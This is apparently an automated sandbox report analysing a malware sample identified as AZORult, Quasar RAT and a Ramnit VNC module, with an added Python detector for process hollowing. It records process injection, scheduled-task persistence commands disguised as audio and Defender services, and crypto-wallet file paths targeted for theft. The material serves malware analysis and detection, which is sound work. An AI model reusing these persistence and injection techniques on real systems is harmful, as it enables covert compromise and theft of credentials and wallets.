Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 1_2_00DB49A0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00E1445A
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C7FDA0 memset,lstrlenW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,memset,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,lstrcpyW,lstrcatW,lstrcatW,memset,RemoveDirectoryW, 5_2_00C7FDA0
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C76554 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,memset,FindFirstFileW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,SetLastError,FindNextFileW,FindClose,SetLastError, 5_2_00C76554
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C7FFA8 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrlenW,HeapAlloc,lstrcpyW,CreateDirectoryW,GetLastError,FindFirstFileW,GetLastError,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree, 5_2_00C7FFA8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose, 7_2_00E1445A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00413030 FindFirstFileW,FindNextFileW,FindClose, 7_2_00413030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_004119A8 FindFirstFileW,FindNextFileW,FindClose, 7_2_004119A8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_004119AC FindFirstFileW,FindNextFileW,FindClose, 7_2_004119AC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00412D6C FindFirstFileW,FindNextFileW,FindClose, 7_2_00412D6C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0041160C FindFirstFileW,FindNextFileW,FindClose, 7_2_0041160C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 7_2_00413F58
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00AA445A GetFileAttributesW,FindFirstFileW,FindClose, 10_2_00AA445A

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress, 1_2_00DB4B37
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_3_037F00BE mov esi, dword ptr fs:[00000030h] 1_3_037F00BE
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00407AF0 mov eax, dword ptr fs:[00000030h] 7_2_00407AF0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_3_014C00BE mov esi, dword ptr fs:[00000030h] 10_3_014C00BE
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_00DB3B3A
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DE5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00DE5A7C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DE97A2 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 1_2_00DE97A2
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\windef.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C9A002 LdrLoadDll, 5_2_00C9A002
Source: C:\Users\user\AppData\Local\Temp\windef.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00DDA155
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00DDA155
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A6A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00A6A155

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Section loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Memory allocated: C:\Windows\System32\svchost.exe base: D00000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Memory written: C:\Users\user\Desktop\CVbJSUXraQ.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Memory written: C:\Users\user\btpanui\SystemPropertiesPerformance.exe base: 400000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_3_037F00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread, 1_3_037F00BE
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EB844380 (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Memory written: C:\Windows\System32\svchost.exe base: D00000
.NET source code references suspicious native API functions
Source: winsock.exe.6.dr, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: winsock.exe.6.dr, ??uf019??u2720???uf88au171b???????u222f?.cs Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Thread register set: target process: 5200
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_00DB48D7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\AppData\Local\Temp\windef.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\windef.exe Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
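How the injection rows in this section add up, as an added example rather than report content: the static chain CreateProcessW, GetThreadContext, ReadProcessMemory, VirtualAllocEx, WriteProcessMemory, VirtualProtectEx, SetThreadContext, ResumeThread is the classic RunPE/process-hollowing sequence, and the dynamic rows show two outcomes of it. The AutoIt loader writes an image starting with 4D5A to base 0x400000 of a suspended copy of itself (the region the Yara section below attributes to AZORult as 7.2.CVbJSUXraQ.exe.400000.0.unpack), and vnc.exe allocates execute/read/write memory in an svchost.exe child, writes to it and sets a thread context (target process 5200). The correlator below folds such primitives per target pid and names the technique they amount to; only pid 5200 appears in the report, so the other pids, the event schema and the written bytes are assumptions.

```python
"""Correlate process-injection primitives per target process into an injection verdict.

Added example, not from the report or any product. The event list is
constructed to mirror what the report records: the AutoIt loader writing an
MZ-prefixed image to 0x400000 in a suspended copy of itself and setting its
thread context, and vnc.exe allocating RWX memory in an svchost.exe child,
writing to it and hijacking a thread. Only pid 5200 appears in the report; the
other pids, the event schema and the written bytes (placeholders) are assumed.
"""
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004   # CreateProcess dwCreationFlags bit


def new_state():
    """Per-target evidence accumulator."""
    return {"image": "?", "suspended": False, "rwx_alloc": False, "foreign_write": False,
            "pe_written": False, "ctx_set": False, "resumed": False, "actors": set()}


def classify(s):
    """Name the technique the accumulated primitives add up to, or None."""
    if s["suspended"] and s["pe_written"] and s["ctx_set"] and s["resumed"]:
        return "process hollowing"          # suspended child + replacement image + context redirect + resume
    if s["foreign_write"] and (s["rwx_alloc"] or s["ctx_set"]):
        return "remote code injection"      # code planted and executed without replacing the image
    return None


def correlate(events):
    """Fold events by target pid; return {pid: (verdict, image, sorted actor pids)} for flagged targets."""
    state = defaultdict(new_state)
    for ev in events:
        s = state[ev["target_pid"]]
        remote = ev["pid"] != ev["target_pid"]          # the primitive was applied from another process
        if ev["op"] == "create_process":
            s["image"] = ev["image"]
            s["suspended"] = bool(ev.get("flags", 0) & CREATE_SUSPENDED)
        elif ev["op"] == "alloc" and ev.get("protect") == "PAGE_EXECUTE_READWRITE":
            s["rwx_alloc"] = True
        elif ev["op"] == "write" and remote:
            s["foreign_write"] = True
            if ev["data"][:2] == b"MZ":                  # a whole PE image is being planted (4D 5A)
                s["pe_written"] = True
        elif ev["op"] == "set_thread_context" and remote:
            s["ctx_set"] = True
        elif ev["op"] == "resume_thread" and remote:
            s["resumed"] = True
        if remote and ev["op"] != "create_process":
            s["actors"].add(ev["pid"])
    return {pid: (classify(s), s["image"], sorted(s["actors"]))
            for pid, s in state.items() if classify(s)}


# Constructed trace mirroring the report; 0xcc bytes stand in for content the report does not show.
EVENTS = [
    {"op": "create_process", "pid": 1, "target_pid": 7, "image": r"C:\Users\user\Desktop\CVbJSUXraQ.exe", "flags": CREATE_SUSPENDED},
    {"op": "write", "pid": 1, "target_pid": 7, "base": 0x400000, "data": b"MZ\x90\x00" + b"\x00" * 4},
    {"op": "set_thread_context", "pid": 1, "target_pid": 7},
    {"op": "resume_thread", "pid": 1, "target_pid": 7},
    {"op": "create_process", "pid": 4, "target_pid": 5200, "image": r"C:\Windows\System32\svchost.exe", "flags": CREATE_SUSPENDED},
    {"op": "alloc", "pid": 4, "target_pid": 5200, "base": 0xD00000, "protect": "PAGE_EXECUTE_READWRITE"},
    {"op": "write", "pid": 4, "target_pid": 5200, "base": 0x7FF6EB844380, "data": b"\xcc" * 8},
    {"op": "write", "pid": 4, "target_pid": 5200, "base": 0xD00000, "data": b"\xcc" * 8},
    {"op": "set_thread_context", "pid": 4, "target_pid": 5200},
    {"op": "resume_thread", "pid": 4, "target_pid": 5200},
    # benign control: ordinary child creation, after which the child writes only to itself
    {"op": "create_process", "pid": 9, "target_pid": 10, "image": r"C:\Windows\System32\notepad.exe", "flags": 0},
    {"op": "write", "pid": 10, "target_pid": 10, "base": 0x20000, "data": b"MZ"},
]

if __name__ == "__main__":
    for pid, (verdict, image, actors) in correlate(EVENTS).items():
        print("pid %d (%s): %s by pid(s) %s" % (pid, image, verdict, actors))
```

The distinction the classifier draws matters for response: a hollowed process still reports the on-disk image of the legitimate binary (here a second CVbJSUXraQ.exe, or svchost.exe in the vnc.exe case), so image-path allow-lists and hash checks on the process will not catch it; what does is the combination of a suspended child, a write from another process, and a thread context change before the first resume.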
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_00DB3B3A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00E0874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 1_2_00E0874B
Source: CVbJSUXraQ.exe, 00000001.00000000.668612321.0000000000E64000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000000.695369238.0000000000AF4000.00000002.00020000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe Binary or memory string: Shell_TrayWnd
Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp Binary or memory string: GetProgmanWindow
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp Binary or memory string: Progman
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, svchost.exe, 00000005.00000000.720749842.0000020DCC390000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.942639016.0000000001DD0000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.942828030.00000000029A0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: CVbJSUXraQ.exe, 00000001.00000002.944000384.00000000016FA000.00000004.00000001.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp Binary or memory string: [CLASS:Progman]
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgrversion.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgr\version.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp Binary or memory string: SetProgmanWindow

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\svchost.exe Code function: GetWindowRect,GetWindowRect,GetWindowRect,RedrawWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetLocaleInfoW,CharUpperBuffW,memcpy,RedrawWindow, 5_2_00C83460
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: GetLocaleInfoA, 7_2_00404BA8
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\windef.exe Queries volume information: C:\Users\user\AppData\Local\Temp\windef.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00ACEA96 cpuid 4_2_00ACEA96
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DD520A GetSystemTimeAsFileTime,__aulldiv, 1_2_00DD520A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_004065F0 GetUserNameW, 7_2_004065F0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 1_2_00DB49A0

Stealing of Sensitive Information:

Yara detected Azorult Info Stealer
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Yara detected Quasar RAT
Source: Yara match File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match File source: dropped/windef.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
Yara detected Azorult
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Detected AZORult Info Stealer
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_004186C4 7_2_004186C4
Yara detected Ramnit VNC Module
Source: Yara match File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vnc.exe PID: 6296, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 5200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: dropped/vnc.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp String found in binary or memory: electrum.dat
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp String found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp String found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp String found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp String found in binary or memory: Coins\Exodus
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp String found in binary or memory: Coins\Ethereum
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR

Remote Access Functionality:

Yara detected Quasar RAT
Source: Yara match File source: CVbJSUXraQ.exe, type: SAMPLE
